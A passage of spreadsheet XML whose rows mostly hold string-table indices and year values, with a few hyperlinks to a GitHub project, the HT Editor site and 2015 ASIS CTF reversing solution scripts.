    <row r="123">
      <c r="A123" s="5" t="s">
        <v>754</v>
      </c>
      <c r="B123" s="43">
        <v>2015.0</v>
      </c>
      <c r="C123" s="5" t="s">
        <v>2451</v>
      </c>
      <c r="D123" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E123" s="5" t="s">
        <v>407</v>
      </c>
      <c r="F123" s="5" t="s">
        <v>1076</v>
      </c>
      <c r="G123" s="5" t="s">
        <v>342</v>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="5" t="s">
        <v>754</v>
      </c>
      <c r="B124" s="43">
        <v>2015.0</v>
      </c>
      <c r="C124" s="5" t="s">
        <v>2453</v>
      </c>
      <c r="D124" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E124" s="5" t="s">
        <v>2456</v>
      </c>
      <c r="F124" s="5" t="s">
        <v>2030</v>
      </c>
      <c r="G124" s="56" t="s">
        <v>2459</v>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="5" t="s">
        <v>754</v>
      </c>
      <c r="B125" s="43">
        <v>2015.0</v>
      </c>
      <c r="C125" s="5" t="s">
        <v>2466</v>
      </c>
      <c r="D125" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E125" s="5" t="s">
        <v>2468</v>
      </c>
      <c r="F125" s="5" t="s">
        <v>2470</v>
      </c>
      <c r="G125" s="56" t="s">
        <v>2471</v>
      </c>
    </row>
    <row r="126">
      <c r="A126" s="85" t="s">
        <v>695</v>
      </c>
      <c r="B126" s="157">
        <v>2015.0</v>
      </c>
      <c r="C126" s="85" t="s">
        <v>2484</v>
      </c>
      <c r="D126" s="85" t="s">
        <v>48</v>
      </c>
      <c r="E126" s="35" t="s">
        <v>676</v>
      </c>
      <c r="F126" s="85" t="s">
        <v>2489</v>
      </c>
      <c r="G126" s="33" t="str">
        <f>HYPERLINK("https://github.com/Drahflow/Elymas","Elymas")</f>
        <v>Elymas</v>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="30" t="s">
        <v>695</v>
      </c>
      <c r="B127" s="31">
        <v>2015.0</v>
      </c>
      <c r="C127" s="30" t="s">
        <v>2501</v>
      </c>
      <c r="D127" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E127" s="30" t="s">
        <v>300</v>
      </c>
      <c r="F127" s="35" t="s">
        <v>2504</v>
      </c>
    </row>
    <row r="128">
      <c r="A128" s="30" t="s">
        <v>695</v>
      </c>
      <c r="B128" s="31">
        <v>2015.0</v>
      </c>
      <c r="C128" s="30" t="s">
        <v>2509</v>
      </c>
      <c r="D128" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E128" s="30" t="s">
        <v>2510</v>
      </c>
      <c r="F128" s="35" t="s">
        <v>2512</v>
      </c>
      <c r="G128" s="30" t="s">
        <v>2514</v>
      </c>
      <c r="H128" s="30"/>
    </row>
    <row r="129">
      <c r="A129" s="109" t="s">
        <v>1540</v>
      </c>
      <c r="B129" s="126">
        <v>2015.0</v>
      </c>
      <c r="C129" s="109" t="s">
        <v>2517</v>
      </c>
      <c r="D129" s="109" t="s">
        <v>23</v>
      </c>
      <c r="E129" s="109" t="s">
        <v>1681</v>
      </c>
      <c r="F129" s="127" t="s">
        <v>2521</v>
      </c>
      <c r="G129" s="109"/>
      <c r="H129" s="30"/>
    </row>
    <row r="130">
      <c r="A130" s="109" t="s">
        <v>1540</v>
      </c>
      <c r="B130" s="126">
        <v>2015.0</v>
      </c>
      <c r="C130" s="109" t="s">
        <v>2522</v>
      </c>
      <c r="D130" s="109" t="s">
        <v>23</v>
      </c>
      <c r="E130" s="109" t="s">
        <v>785</v>
      </c>
      <c r="F130" s="109" t="s">
        <v>2523</v>
      </c>
      <c r="G130" s="109" t="s">
        <v>2524</v>
      </c>
    </row>
    <row r="131">
      <c r="A131" s="30" t="s">
        <v>1540</v>
      </c>
      <c r="B131" s="31">
        <v>2015.0</v>
      </c>
      <c r="C131" s="30" t="s">
        <v>2530</v>
      </c>
      <c r="D131" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E131" s="35" t="s">
        <v>407</v>
      </c>
      <c r="F131" s="35" t="s">
        <v>2533</v>
      </c>
      <c r="G131" s="30" t="s">
        <v>1455</v>
      </c>
    </row>
    <row r="132">
      <c r="A132" s="30" t="s">
        <v>1540</v>
      </c>
      <c r="B132" s="31">
        <v>2015.0</v>
      </c>
      <c r="C132" s="30" t="s">
        <v>2537</v>
      </c>
      <c r="D132" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E132" s="30" t="s">
        <v>909</v>
      </c>
      <c r="F132" s="35" t="s">
        <v>2540</v>
      </c>
      <c r="G132" s="30"/>
      <c r="H132" s="30"/>
    </row>
    <row r="133">
      <c r="A133" s="17">
        <v>42542.0</v>
      </c>
      <c r="B133" s="65"/>
      <c r="C133" s="65"/>
      <c r="D133" s="65"/>
      <c r="E133" s="9"/>
      <c r="F133" s="65"/>
      <c r="G133" s="65"/>
      <c r="H133" s="66"/>
      <c r="I133" s="9"/>
      <c r="J133" s="9"/>
      <c r="K133" s="9"/>
      <c r="L133" s="9"/>
      <c r="M133" s="9"/>
      <c r="N133" s="9"/>
      <c r="O133" s="9"/>
      <c r="P133" s="9"/>
      <c r="Q133" s="9"/>
      <c r="R133" s="9"/>
      <c r="S133" s="9"/>
      <c r="T133" s="9"/>
      <c r="U133" s="9"/>
      <c r="V133" s="9"/>
      <c r="W133" s="9"/>
      <c r="X133" s="9"/>
      <c r="Y133" s="9"/>
      <c r="Z133" s="9"/>
    </row>
    <row r="134">
      <c r="A134" s="37">
        <v>9447.0</v>
      </c>
      <c r="B134" s="40">
        <v>2015.0</v>
      </c>
      <c r="C134" s="40" t="s">
        <v>2544</v>
      </c>
      <c r="D134" s="40" t="s">
        <v>128</v>
      </c>
      <c r="E134" s="40" t="s">
        <v>2545</v>
      </c>
      <c r="F134" s="40" t="s">
        <v>2546</v>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="5" t="s">
        <v>424</v>
      </c>
      <c r="B135" s="43">
        <v>2015.0</v>
      </c>
      <c r="C135" s="5" t="s">
        <v>1787</v>
      </c>
      <c r="D135" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E135" s="5" t="s">
        <v>676</v>
      </c>
      <c r="F135" s="5" t="s">
        <v>2547</v>
      </c>
      <c r="G135" s="5" t="s">
        <v>342</v>
      </c>
    </row>
    <row r="136">
      <c r="A136" s="5" t="s">
        <v>424</v>
      </c>
      <c r="B136" s="43">
        <v>2015.0</v>
      </c>
      <c r="C136" s="5" t="s">
        <v>2548</v>
      </c>
      <c r="D136" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E136" s="5" t="s">
        <v>676</v>
      </c>
      <c r="F136" s="5" t="s">
        <v>130</v>
      </c>
      <c r="G136" s="5" t="s">
        <v>2550</v>
      </c>
    </row>
    <row r="137">
      <c r="A137" s="5" t="s">
        <v>424</v>
      </c>
      <c r="B137" s="43">
        <v>2015.0</v>
      </c>
      <c r="C137" s="5" t="s">
        <v>2554</v>
      </c>
      <c r="D137" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E137" s="5" t="s">
        <v>676</v>
      </c>
      <c r="F137" s="5" t="s">
        <v>682</v>
      </c>
      <c r="G137" s="5" t="s">
        <v>2556</v>
      </c>
    </row>
    <row r="138">
      <c r="A138" s="5" t="s">
        <v>424</v>
      </c>
      <c r="B138" s="43">
        <v>2015.0</v>
      </c>
      <c r="C138" s="5" t="s">
        <v>2560</v>
      </c>
      <c r="D138" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E138" s="5" t="s">
        <v>676</v>
      </c>
      <c r="F138" s="5" t="s">
        <v>2562</v>
      </c>
      <c r="G138" s="3"/>
    </row>
    <row r="139">
      <c r="A139" s="113" t="s">
        <v>1011</v>
      </c>
      <c r="B139" s="115">
        <v>2015.0</v>
      </c>
      <c r="C139" s="113" t="s">
        <v>2564</v>
      </c>
      <c r="D139" s="113" t="s">
        <v>48</v>
      </c>
      <c r="E139" s="113" t="s">
        <v>1787</v>
      </c>
      <c r="F139" s="111" t="s">
        <v>2568</v>
      </c>
      <c r="G139" s="111" t="s">
        <v>1139</v>
      </c>
      <c r="H139" s="30"/>
    </row>
    <row r="140">
      <c r="A140" s="113" t="s">
        <v>1011</v>
      </c>
      <c r="B140" s="115">
        <v>2015.0</v>
      </c>
      <c r="C140" s="113" t="s">
        <v>2571</v>
      </c>
      <c r="D140" s="113" t="s">
        <v>48</v>
      </c>
      <c r="E140" s="111" t="s">
        <v>1787</v>
      </c>
      <c r="F140" s="113" t="s">
        <v>2573</v>
      </c>
    </row>
    <row r="141">
      <c r="A141" s="30" t="s">
        <v>1011</v>
      </c>
      <c r="B141" s="31">
        <v>2015.0</v>
      </c>
      <c r="C141" s="30" t="s">
        <v>2576</v>
      </c>
      <c r="D141" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E141" s="30" t="s">
        <v>2578</v>
      </c>
      <c r="F141" s="35" t="s">
        <v>2580</v>
      </c>
    </row>
    <row r="142">
      <c r="A142" s="30" t="s">
        <v>1011</v>
      </c>
      <c r="B142" s="31">
        <v>2015.0</v>
      </c>
      <c r="C142" s="30" t="s">
        <v>2582</v>
      </c>
      <c r="D142" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E142" s="30" t="s">
        <v>2080</v>
      </c>
      <c r="F142" s="30" t="s">
        <v>2587</v>
      </c>
    </row>
    <row r="143">
      <c r="A143" s="109" t="s">
        <v>1011</v>
      </c>
      <c r="B143" s="126">
        <v>2015.0</v>
      </c>
      <c r="C143" s="109" t="s">
        <v>2590</v>
      </c>
      <c r="D143" s="109" t="s">
        <v>23</v>
      </c>
      <c r="E143" s="109" t="s">
        <v>2080</v>
      </c>
      <c r="F143" s="109" t="s">
        <v>2591</v>
      </c>
      <c r="G143" s="128"/>
    </row>
    <row r="144">
      <c r="A144" s="109" t="s">
        <v>857</v>
      </c>
      <c r="B144" s="126">
        <v>2015.0</v>
      </c>
      <c r="C144" s="109" t="s">
        <v>2593</v>
      </c>
      <c r="D144" s="109" t="s">
        <v>48</v>
      </c>
      <c r="E144" s="109" t="s">
        <v>2595</v>
      </c>
      <c r="F144" s="127" t="s">
        <v>2596</v>
      </c>
      <c r="G144" s="109" t="s">
        <v>2598</v>
      </c>
      <c r="H144" s="109" t="s">
        <v>2600</v>
      </c>
      <c r="I144" s="30"/>
      <c r="J144" s="30"/>
    </row>
    <row r="145">
      <c r="A145" s="17">
        <v>42545.0</v>
      </c>
      <c r="B145" s="65"/>
      <c r="C145" s="65"/>
      <c r="D145" s="65"/>
      <c r="E145" s="9"/>
      <c r="F145" s="65"/>
      <c r="G145" s="65"/>
      <c r="H145" s="66"/>
      <c r="I145" s="9"/>
      <c r="J145" s="9"/>
      <c r="K145" s="9"/>
      <c r="L145" s="9"/>
      <c r="M145" s="9"/>
      <c r="N145" s="9"/>
      <c r="O145" s="9"/>
      <c r="P145" s="9"/>
      <c r="Q145" s="9"/>
      <c r="R145" s="9"/>
      <c r="S145" s="9"/>
      <c r="T145" s="9"/>
      <c r="U145" s="9"/>
      <c r="V145" s="9"/>
      <c r="W145" s="9"/>
      <c r="X145" s="9"/>
      <c r="Y145" s="9"/>
      <c r="Z145" s="9"/>
    </row>
    <row r="146">
      <c r="A146" s="70" t="s">
        <v>1040</v>
      </c>
      <c r="B146" s="71">
        <v>2015.0</v>
      </c>
      <c r="C146" s="70" t="s">
        <v>2606</v>
      </c>
      <c r="D146" s="70" t="s">
        <v>128</v>
      </c>
      <c r="E146" s="70" t="s">
        <v>676</v>
      </c>
      <c r="F146" s="70" t="s">
        <v>2607</v>
      </c>
      <c r="G146" s="70" t="s">
        <v>342</v>
      </c>
      <c r="H146" s="29"/>
      <c r="I146" s="29"/>
      <c r="J146" s="29"/>
      <c r="K146" s="29"/>
      <c r="L146" s="29"/>
      <c r="M146" s="29"/>
      <c r="N146" s="29"/>
      <c r="O146" s="29"/>
      <c r="P146" s="29"/>
      <c r="Q146" s="29"/>
      <c r="R146" s="29"/>
      <c r="S146" s="29"/>
      <c r="T146" s="29"/>
      <c r="U146" s="29"/>
      <c r="V146" s="29"/>
      <c r="W146" s="29"/>
      <c r="X146" s="29"/>
      <c r="Y146" s="29"/>
      <c r="Z146" s="29"/>
    </row>
    <row r="147">
      <c r="A147" s="23" t="s">
        <v>1111</v>
      </c>
      <c r="B147" s="24">
        <v>2015.0</v>
      </c>
      <c r="C147" s="23" t="s">
        <v>2608</v>
      </c>
      <c r="D147" s="23" t="s">
        <v>128</v>
      </c>
      <c r="E147" s="23" t="s">
        <v>407</v>
      </c>
      <c r="F147" s="23" t="s">
        <v>2609</v>
      </c>
      <c r="G147" s="23" t="s">
        <v>682</v>
      </c>
      <c r="I147" s="28"/>
      <c r="J147" s="29"/>
      <c r="K147" s="29"/>
      <c r="L147" s="29"/>
      <c r="M147" s="29"/>
      <c r="N147" s="29"/>
      <c r="O147" s="29"/>
      <c r="P147" s="29"/>
      <c r="Q147" s="29"/>
      <c r="R147" s="29"/>
      <c r="S147" s="29"/>
      <c r="T147" s="29"/>
      <c r="U147" s="29"/>
      <c r="V147" s="29"/>
      <c r="W147" s="29"/>
      <c r="X147" s="29"/>
      <c r="Y147" s="29"/>
      <c r="Z147" s="29"/>
    </row>
    <row r="148">
      <c r="A148" s="23" t="s">
        <v>1111</v>
      </c>
      <c r="B148" s="24">
        <v>2015.0</v>
      </c>
      <c r="C148" s="23" t="s">
        <v>2612</v>
      </c>
      <c r="D148" s="23" t="s">
        <v>128</v>
      </c>
      <c r="E148" s="23" t="s">
        <v>2613</v>
      </c>
      <c r="F148" s="23" t="s">
        <v>2614</v>
      </c>
      <c r="G148" s="23" t="s">
        <v>2615</v>
      </c>
      <c r="I148" s="28"/>
      <c r="J148" s="29"/>
      <c r="K148" s="29"/>
      <c r="L148" s="29"/>
      <c r="M148" s="29"/>
      <c r="N148" s="29"/>
      <c r="O148" s="29"/>
      <c r="P148" s="29"/>
      <c r="Q148" s="29"/>
      <c r="R148" s="29"/>
      <c r="S148" s="29"/>
      <c r="T148" s="29"/>
      <c r="U148" s="29"/>
      <c r="V148" s="29"/>
      <c r="W148" s="29"/>
      <c r="X148" s="29"/>
      <c r="Y148" s="29"/>
      <c r="Z148" s="29"/>
    </row>
    <row r="149">
      <c r="A149" s="23" t="s">
        <v>1111</v>
      </c>
      <c r="B149" s="24">
        <v>2015.0</v>
      </c>
      <c r="C149" s="23" t="s">
        <v>2617</v>
      </c>
      <c r="D149" s="23" t="s">
        <v>128</v>
      </c>
      <c r="E149" s="23" t="s">
        <v>407</v>
      </c>
      <c r="F149" s="23" t="s">
        <v>2619</v>
      </c>
      <c r="G149" s="23" t="s">
        <v>2620</v>
      </c>
      <c r="J149" s="29"/>
      <c r="K149" s="29"/>
      <c r="L149" s="29"/>
      <c r="M149" s="29"/>
      <c r="N149" s="29"/>
      <c r="O149" s="29"/>
      <c r="P149" s="29"/>
      <c r="Q149" s="29"/>
      <c r="R149" s="29"/>
      <c r="S149" s="29"/>
      <c r="T149" s="29"/>
      <c r="U149" s="29"/>
      <c r="V149" s="29"/>
      <c r="W149" s="29"/>
      <c r="X149" s="29"/>
      <c r="Y149" s="29"/>
      <c r="Z149" s="29"/>
    </row>
    <row r="150">
      <c r="A150" s="23" t="s">
        <v>1111</v>
      </c>
      <c r="B150" s="24">
        <v>2015.0</v>
      </c>
      <c r="C150" s="23" t="s">
        <v>2627</v>
      </c>
      <c r="D150" s="23" t="s">
        <v>128</v>
      </c>
      <c r="E150" s="23" t="s">
        <v>407</v>
      </c>
      <c r="F150" s="23" t="s">
        <v>2628</v>
      </c>
      <c r="G150" s="23" t="s">
        <v>2629</v>
      </c>
      <c r="J150" s="29"/>
      <c r="K150" s="29"/>
      <c r="L150" s="29"/>
      <c r="M150" s="29"/>
      <c r="N150" s="29"/>
      <c r="O150" s="29"/>
      <c r="P150" s="29"/>
      <c r="Q150" s="29"/>
      <c r="R150" s="29"/>
      <c r="S150" s="29"/>
      <c r="T150" s="29"/>
      <c r="U150" s="29"/>
      <c r="V150" s="29"/>
      <c r="W150" s="29"/>
      <c r="X150" s="29"/>
      <c r="Y150" s="29"/>
      <c r="Z150" s="29"/>
    </row>
    <row r="151">
      <c r="A151" s="23" t="s">
        <v>1111</v>
      </c>
      <c r="B151" s="24">
        <v>2015.0</v>
      </c>
      <c r="C151" s="23" t="s">
        <v>2633</v>
      </c>
      <c r="D151" s="23" t="s">
        <v>48</v>
      </c>
      <c r="E151" s="23" t="s">
        <v>2634</v>
      </c>
      <c r="F151" s="23" t="s">
        <v>2636</v>
      </c>
      <c r="G151" s="23" t="s">
        <v>2638</v>
      </c>
      <c r="I151" s="23" t="s">
        <v>2640</v>
      </c>
      <c r="J151" s="29"/>
      <c r="K151" s="29"/>
      <c r="L151" s="29"/>
      <c r="M151" s="29"/>
      <c r="N151" s="29"/>
      <c r="O151" s="29"/>
      <c r="P151" s="29"/>
      <c r="Q151" s="29"/>
      <c r="R151" s="29"/>
      <c r="S151" s="29"/>
      <c r="T151" s="29"/>
      <c r="U151" s="29"/>
      <c r="V151" s="29"/>
      <c r="W151" s="29"/>
      <c r="X151" s="29"/>
      <c r="Y151" s="29"/>
      <c r="Z151" s="29"/>
    </row>
    <row r="152">
      <c r="A152" s="17">
        <v>42552.0</v>
      </c>
      <c r="B152" s="65"/>
      <c r="C152" s="65"/>
      <c r="D152" s="65"/>
      <c r="E152" s="9"/>
      <c r="F152" s="65"/>
      <c r="G152" s="65"/>
      <c r="H152" s="66"/>
      <c r="I152" s="9"/>
      <c r="J152" s="9"/>
      <c r="K152" s="9"/>
      <c r="L152" s="9"/>
      <c r="M152" s="9"/>
      <c r="N152" s="9"/>
      <c r="O152" s="9"/>
      <c r="P152" s="9"/>
      <c r="Q152" s="9"/>
      <c r="R152" s="9"/>
      <c r="S152" s="9"/>
      <c r="T152" s="9"/>
      <c r="U152" s="9"/>
      <c r="V152" s="9"/>
      <c r="W152" s="9"/>
      <c r="X152" s="9"/>
      <c r="Y152" s="9"/>
      <c r="Z152" s="9"/>
    </row>
    <row r="153">
      <c r="A153" s="5" t="s">
        <v>348</v>
      </c>
      <c r="B153" s="43">
        <v>2015.0</v>
      </c>
      <c r="C153" s="5" t="s">
        <v>2654</v>
      </c>
      <c r="D153" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E153" s="5" t="s">
        <v>2656</v>
      </c>
      <c r="F153" s="160" t="s">
        <v>2660</v>
      </c>
      <c r="G153" s="5" t="s">
        <v>968</v>
      </c>
    </row>
    <row r="154">
      <c r="A154" s="5" t="s">
        <v>348</v>
      </c>
      <c r="B154" s="43">
        <v>2015.0</v>
      </c>
      <c r="C154" s="5" t="s">
        <v>2686</v>
      </c>
      <c r="D154" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E154" s="5" t="s">
        <v>2698</v>
      </c>
      <c r="F154" s="5" t="s">
        <v>2700</v>
      </c>
      <c r="G154" s="5" t="s">
        <v>342</v>
      </c>
    </row>
    <row r="155">
      <c r="A155" s="5" t="s">
        <v>348</v>
      </c>
      <c r="B155" s="43">
        <v>2015.0</v>
      </c>
      <c r="C155" s="5" t="s">
        <v>2702</v>
      </c>
      <c r="D155" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E155" s="5" t="s">
        <v>2656</v>
      </c>
      <c r="F155" s="5" t="s">
        <v>2706</v>
      </c>
      <c r="G155" s="5" t="s">
        <v>2707</v>
      </c>
    </row>
    <row r="156">
      <c r="A156" s="5" t="s">
        <v>348</v>
      </c>
      <c r="B156" s="43">
        <v>2015.0</v>
      </c>
      <c r="C156" s="5" t="s">
        <v>2711</v>
      </c>
      <c r="D156" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E156" s="5" t="s">
        <v>2713</v>
      </c>
      <c r="F156" s="5" t="s">
        <v>2715</v>
      </c>
      <c r="G156" s="3"/>
    </row>
    <row r="157">
      <c r="A157" s="5" t="s">
        <v>348</v>
      </c>
      <c r="B157" s="43">
        <v>2015.0</v>
      </c>
      <c r="C157" s="5" t="s">
        <v>2716</v>
      </c>
      <c r="D157" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E157" s="5" t="s">
        <v>300</v>
      </c>
      <c r="F157" s="5" t="s">
        <v>2719</v>
      </c>
      <c r="G157" s="3"/>
    </row>
    <row r="158">
      <c r="A158" s="5" t="s">
        <v>348</v>
      </c>
      <c r="B158" s="43">
        <v>2015.0</v>
      </c>
      <c r="C158" s="5" t="s">
        <v>2723</v>
      </c>
      <c r="D158" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E158" s="5" t="s">
        <v>2725</v>
      </c>
      <c r="F158" s="5" t="s">
        <v>2727</v>
      </c>
      <c r="G158" s="3"/>
    </row>
    <row r="159">
      <c r="A159" s="113" t="s">
        <v>1132</v>
      </c>
      <c r="B159" s="115">
        <v>2015.0</v>
      </c>
      <c r="C159" s="113" t="s">
        <v>2730</v>
      </c>
      <c r="D159" s="113" t="s">
        <v>48</v>
      </c>
      <c r="E159" s="113" t="s">
        <v>2080</v>
      </c>
      <c r="F159" s="111" t="s">
        <v>2735</v>
      </c>
      <c r="G159" s="113" t="s">
        <v>2737</v>
      </c>
      <c r="H159" s="30"/>
    </row>
    <row r="160">
      <c r="A160" s="30" t="s">
        <v>1132</v>
      </c>
      <c r="B160" s="31">
        <v>2015.0</v>
      </c>
      <c r="C160" s="30" t="s">
        <v>2739</v>
      </c>
      <c r="D160" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E160" s="30" t="s">
        <v>2740</v>
      </c>
      <c r="F160" s="35" t="s">
        <v>2743</v>
      </c>
      <c r="G160" s="113" t="s">
        <v>2737</v>
      </c>
      <c r="H160" s="30"/>
    </row>
    <row r="161">
      <c r="A161" s="30" t="s">
        <v>1132</v>
      </c>
      <c r="B161" s="31">
        <v>2015.0</v>
      </c>
      <c r="C161" s="30" t="s">
        <v>2746</v>
      </c>
      <c r="D161" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E161" s="30" t="s">
        <v>627</v>
      </c>
      <c r="F161" s="32" t="s">
        <v>2748</v>
      </c>
      <c r="G161" s="30" t="s">
        <v>2749</v>
      </c>
      <c r="H161" s="30"/>
      <c r="I161" s="30"/>
      <c r="J161" s="30"/>
      <c r="K161" s="30"/>
    </row>
    <row r="162">
      <c r="A162" s="5" t="s">
        <v>1140</v>
      </c>
      <c r="B162" s="43">
        <v>2015.0</v>
      </c>
      <c r="C162" s="5" t="s">
        <v>2761</v>
      </c>
      <c r="D162" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E162" s="5" t="s">
        <v>676</v>
      </c>
      <c r="F162" s="5" t="s">
        <v>2765</v>
      </c>
      <c r="G162" s="5" t="s">
        <v>2767</v>
      </c>
    </row>
    <row r="163">
      <c r="A163" s="5" t="s">
        <v>1140</v>
      </c>
      <c r="B163" s="43">
        <v>2015.0</v>
      </c>
      <c r="C163" s="5" t="s">
        <v>2769</v>
      </c>
      <c r="D163" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E163" s="5" t="s">
        <v>2772</v>
      </c>
      <c r="F163" s="5" t="s">
        <v>2776</v>
      </c>
      <c r="G163" s="56" t="s">
        <v>2778</v>
      </c>
    </row>
    <row r="164">
      <c r="A164" s="5" t="s">
        <v>1140</v>
      </c>
      <c r="B164" s="43">
        <v>2015.0</v>
      </c>
      <c r="C164" s="5" t="s">
        <v>2786</v>
      </c>
      <c r="D164" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E164" s="5" t="s">
        <v>2787</v>
      </c>
      <c r="F164" s="5" t="s">
        <v>2788</v>
      </c>
      <c r="G164" s="5" t="s">
        <v>2789</v>
      </c>
    </row>
    <row r="165">
      <c r="A165" s="5" t="s">
        <v>1140</v>
      </c>
      <c r="B165" s="43">
        <v>2015.0</v>
      </c>
      <c r="C165" s="5" t="s">
        <v>2790</v>
      </c>
      <c r="D165" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E165" s="5" t="s">
        <v>2791</v>
      </c>
      <c r="F165" s="5" t="s">
        <v>2792</v>
      </c>
      <c r="G165" s="5" t="s">
        <v>2794</v>
      </c>
    </row>
    <row r="166">
      <c r="A166" s="5" t="s">
        <v>1140</v>
      </c>
      <c r="B166" s="43">
        <v>2015.0</v>
      </c>
      <c r="C166" s="5" t="s">
        <v>1856</v>
      </c>
      <c r="D166" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E166" s="5" t="s">
        <v>2799</v>
      </c>
      <c r="F166" s="5" t="s">
        <v>2802</v>
      </c>
      <c r="G166" s="56" t="s">
        <v>2805</v>
      </c>
    </row>
    <row r="167">
      <c r="A167" s="5" t="s">
        <v>1140</v>
      </c>
      <c r="B167" s="43">
        <v>2015.0</v>
      </c>
      <c r="C167" s="5" t="s">
        <v>2806</v>
      </c>
      <c r="D167" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E167" s="5" t="s">
        <v>116</v>
      </c>
      <c r="F167" s="5" t="s">
        <v>2808</v>
      </c>
      <c r="G167" s="5" t="s">
        <v>342</v>
      </c>
    </row>
    <row r="168">
      <c r="A168" s="40" t="s">
        <v>1719</v>
      </c>
      <c r="B168" s="40">
        <v>2015.0</v>
      </c>
      <c r="C168" s="40" t="s">
        <v>2811</v>
      </c>
      <c r="D168" s="40" t="s">
        <v>48</v>
      </c>
      <c r="F168" s="40" t="s">
        <v>2812</v>
      </c>
      <c r="G168" s="40" t="s">
        <v>2814</v>
      </c>
    </row>
    <row r="169">
      <c r="A169" s="30" t="s">
        <v>1159</v>
      </c>
      <c r="B169" s="31">
        <v>2015.0</v>
      </c>
      <c r="C169" s="30" t="s">
        <v>2817</v>
      </c>
      <c r="D169" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E169" s="30" t="s">
        <v>2080</v>
      </c>
      <c r="F169" s="35" t="s">
        <v>2820</v>
      </c>
      <c r="G169" s="33" t="str">
        <f>HYPERLINK("https://github.com/smokeleeteveryday/CTF_WRITEUPS/blob/master/2015/ASISCTF/reversing/dark/solution/dark_descramble.py","Darkdescramble.py")</f>
        <v>Darkdescramble.py</v>
      </c>
      <c r="H169" s="30"/>
      <c r="I169" s="30"/>
    </row>
    <row r="170">
      <c r="A170" s="30" t="s">
        <v>1159</v>
      </c>
      <c r="B170" s="31">
        <v>2015.0</v>
      </c>
      <c r="C170" s="30" t="s">
        <v>2828</v>
      </c>
      <c r="D170" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E170" s="30" t="s">
        <v>2080</v>
      </c>
      <c r="F170" s="35" t="s">
        <v>2833</v>
      </c>
      <c r="G170" s="33" t="str">
        <f>HYPERLINK("http://hte.sourceforge.net/","HT Editor")</f>
        <v>HT Editor</v>
      </c>
      <c r="H170" s="30"/>
      <c r="I170" s="30"/>
    </row>
    <row r="171">
      <c r="A171" s="30" t="s">
        <v>1159</v>
      </c>
      <c r="B171" s="31">
        <v>2015.0</v>
      </c>
      <c r="C171" s="30" t="s">
        <v>2847</v>
      </c>
      <c r="D171" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E171" s="30" t="s">
        <v>2080</v>
      </c>
      <c r="F171" s="35" t="s">
        <v>2848</v>
      </c>
      <c r="G171" s="30" t="s">
        <v>2849</v>
      </c>
      <c r="H171" s="30"/>
      <c r="I171" s="30"/>
    </row>
    <row r="172">
      <c r="A172" s="30" t="s">
        <v>1159</v>
      </c>
      <c r="B172" s="31">
        <v>2015.0</v>
      </c>
      <c r="C172" s="30" t="s">
        <v>2850</v>
      </c>
      <c r="D172" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E172" s="30" t="s">
        <v>2080</v>
      </c>
      <c r="F172" s="35" t="s">
        <v>2852</v>
      </c>
      <c r="G172" s="33" t="str">
        <f>HYPERLINK("https://github.com/smokeleeteveryday/CTF_WRITEUPS/blob/master/2015/ASISCTF/reversing/selfie/solution/selfie_descramble.py","SelfieDescrable.py")</f>
        <v>SelfieDescrable.py</v>
      </c>
      <c r="H172" s="30"/>
      <c r="I172" s="30"/>
    </row>
    <row r="173">
      <c r="A173" s="30" t="s">
        <v>1159</v>
      </c>
      <c r="B173" s="31">
        <v>2015.0</v>
      </c>
      <c r="C173" s="30" t="s">
        <v>2864</v>
      </c>
      <c r="D173" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E173" s="30" t="s">
        <v>2080</v>
      </c>
      <c r="F173" s="35" t="s">
        <v>2865</v>
      </c>
      <c r="G173" s="33" t="str">
        <f>HYPERLINK("https://github.com/smokeleeteveryday/CTF_WRITEUPS/blob/master/2015/ASISCTF/reversing/tera/solution/tera_decoder.py"," tera_decoder.py")</f>
        <v> tera_decoder.py</v>
      </c>
      <c r="H173" s="30"/>
      <c r="I173" s="30"/>
    </row>
    <row r="174">
      <c r="A174" s="17">
        <v>42570.0</v>
      </c>
      <c r="B174" s="65"/>
      <c r="C174" s="65"/>
      <c r="D174" s="65"/>
      <c r="E174" s="9"/>
      <c r="F174" s="65"/>
      <c r="G174" s="65"/>
      <c r="H174" s="66"/>
      <c r="I174" s="9"/>
      <c r="J174" s="9"/>
      <c r="K174" s="9"/>
      <c r="L174" s="9"/>
      <c r="M174" s="9"/>
      <c r="N174" s="9"/>
      <c r="O174" s="9"/>
      <c r="P174" s="9"/>
      <c r="Q174" s="9"/>
      <c r="R174" s="9"/>
      <c r="S174" s="9"/>
      <c r="T174" s="9"/>
      <c r="U174" s="9"/>
      <c r="V174" s="9"/>
      <c r="W174" s="9"/>
      <c r="X174" s="9"/>
      <c r="Y174" s="9"/>
      <c r="Z174" s="9"/>
    </row>
    <row r="175">
      <c r="A175" s="30" t="s">
        <v>1193</v>
      </c>
      <c r="B175" s="31">
        <v>2015.0</v>
      </c>
